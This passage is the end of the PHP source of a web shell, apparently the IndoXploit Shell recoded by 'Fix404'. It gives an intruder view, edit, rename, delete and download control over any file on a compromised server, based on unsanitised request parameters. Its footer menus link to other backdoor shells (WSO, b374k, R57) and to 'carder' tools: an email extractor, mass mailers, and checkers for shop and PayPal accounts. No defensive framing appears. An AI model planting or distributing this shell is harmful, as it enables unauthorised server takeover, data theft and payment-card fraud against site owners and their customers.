4061.     echo "Filename: <font color=aqua>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4062.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4063. } elseif($_GET['act'] == 'edit') {
4064.     if($_POST['save']) {
4065.         $save = file_put_contents($_GET['file'], $_POST['src']);
4066.         if($save) {
4067.             $act = "<font color=aqua>Saved!</font>";
4068.         } else {
4069.             $act = "<font color=white>permission denied</font>";
4070.         }
4071.     echo "".$act."<br>";
4072.     }
4073.     echo "Filename: <font color=aqua>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4074.     echo "<form method='post'>
4075.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4076.     <input type='submit' value='Save' name='save' style='width: 500px;'>
4077.     </form>";
4078. } elseif($_GET['act'] == 'rename') {
4079.     if($_POST['do_rename']) {
4080.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4081.         if($rename) {
4082.             $act = "<script>window.location='?dir=".$dir."';</script>";
4083.         } else {
4084.             $act = "<font color=white>permission denied</font>";
4085.         }
4086.     echo "".$act."<br>";
4087.     }
4088.     echo "Filename: <font color=aqua>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4089.     echo "<form method='post'>
4090.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4091.     <input type='submit' name='do_rename' value='rename'>
4092.     </form>";
4093. } elseif($_GET['act'] == 'delete') {
4094.     $delete = unlink($_GET['file']);
4095.     if($delete) {
4096.         $act = "<script>window.location='?dir=".$dir."';</script>";
4097.     } else {
4098.         $act = "<font color=white>permission denied</font>";
4099.     }
4100.     echo $act;
4101. }else {
4102.     if(is_dir($dir) == true) {
4103.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4104.        
4105.         <tr>
4106.         <th class="th_home"><font color="white"><center>Name</center></font></th>
4107.         <th class="th_home"><center><font color="white">Type</center></th>
4108.         <th class="th_home"><center><font color="white">Size</center></th>
4109.         <th class="th_home"><center><font color="white">Last Modified</center></th>
4110.         <th class="th_home"><center><font color="white">Permission</center></th>
4111.         <th class="th_home"><center><font color="white">Action</center></th>
4112.         </tr>';
4113.        
4114.         $scandir = scandir($dir);
4115.         foreach($scandir as $dirx) {
4116.             $dtype = filetype("$dir/$dirx");
4117.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4118.             if(!is_dir("$dir/$dirx")) continue;
4119.             if($dirx === '..') {
4120.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4121.             } elseif($dirx === '.') {
4122.                 $href = "<a href='?dir=$dir'>$dirx</a>";
4123.             } else {
4124.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4125.             }
4126.             if($dirx === '.' || $dirx === '..') {
4127.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4128.                 } else {
4129.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4130.             }
4131.             echo "<tr>";
4132.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4133.             echo "<td class='td_home'><center><font color='white'>$dtype</center></td>";
4134.             echo "<td class='td_home'><center><font color='white'>-</center></th>";
4135.             echo "<td class='td_home'><center><font color='white'>$dtime</center></td>";
4136.             echo "<td class='td_home'><center><font color='white'>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4137.             echo "<td class='td_home' style='padding-left: 15px;'><font color='white'>$act_dir</td>";
4138.         }
4139.         echo "</tr>";
4140.         foreach($scandir as $file) {
4141.             $ftype = filetype("$dir/$file");
4142.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4143.             $size = filesize("$dir/$file")/1024;
4144.             $size = round($size,3);
4145.             if($size > 1024) {
4146.                 $size = round($size/1024,2). 'MB';
4147.             } else {
4148.                 $size = $size. 'KB';
4149.             }
4150.             if(!is_file("$dir/$file")) continue;
4151.             echo "<tr>";
4152.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'><font color='white'>$file</a></td>";
4153.             echo "<td class='td_home'><center><font color='white'>$ftype</center></td>";
4154.             echo "<td class='td_home'><center><font color='white'>$size</center></td>";
4155.             echo "<td class='td_home'><center><font color='white'>$ftime</center></td>";
4156.             echo "<td class='td_home'><center><font color='white'>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4157.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4158.         }
4159.         echo "</tr></table>";
4160.     } else {
4161.         echo "<font color=white>can't open directory</font>";
4162.     }
4163.     }
4164. echo "<center><hr><form>
4165. <select onchange='if (this.value) window.open(this.value);'>
4166.   <option selected='selected' value=''> Tools Creator </option>
4167.   <option value='$ling=wso'>WSO 2.8.1</option>
4168.   <option value='$ling=injection'>1n73ction v3</option>
4169.   <option value='$ling=wk'>WHMCS Killer</option>
4170.   <option value='$ling=adminer'>Adminer</option>
4171.   <option value='$ling=b374k'>b374k Shell</option>
4172.   <option value='$ling=b374k323'>b374k 3.2</option>  
4173.   <option value='$ling=bh'>BlackHat Shell</option>      
4174.   <option value='$ling=dhanus'>Dhanush Shell</option>    
4175.   <option value='$ling=r57'>R57 Shell</option>    
4176. <option value='$ling=encodedecode'>Encode Decode</option>    
4177. <option value='$ling=r57'>R57 Shell</option>    
4178. </select>
4179. <select onchange='if (this.value) window.open(this.value);'>
4180.   <option selected='selected' value=''> Tools Carder </option>
4181.   <option value='$ling=extractor'>DB Email Extractor</option>
4182.   <option value='$ling=promailerv2'>Pro Mailer V2</option>    
4183.   <option value='$ling=bukalapak'>BukaLapak Checker</option>        
4184.   <option value='$ling=tokopedia'>TokoPedia Checker</option>  
4185.   <option value='$ling=tokenpp'>Paypal Token Generator</option>  
4186.   <option value='$ling=mailer'>Mailer</option>  
4187.   <option value='$ling=gamestopceker'>GamesTop Checker</option>
4188.   </select>
4189. <noscript><input type='submit' value='Submit'></noscript><br>
4190. </form>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=cyan>IndoXploit</font></a> Shell Recoded By <a href='https://www.facebook.com/zoreforce' target='_BLANK'><font color=cyan>Fix404</a></font></center>";
4191. ?>
4192. </font>
4193. </html>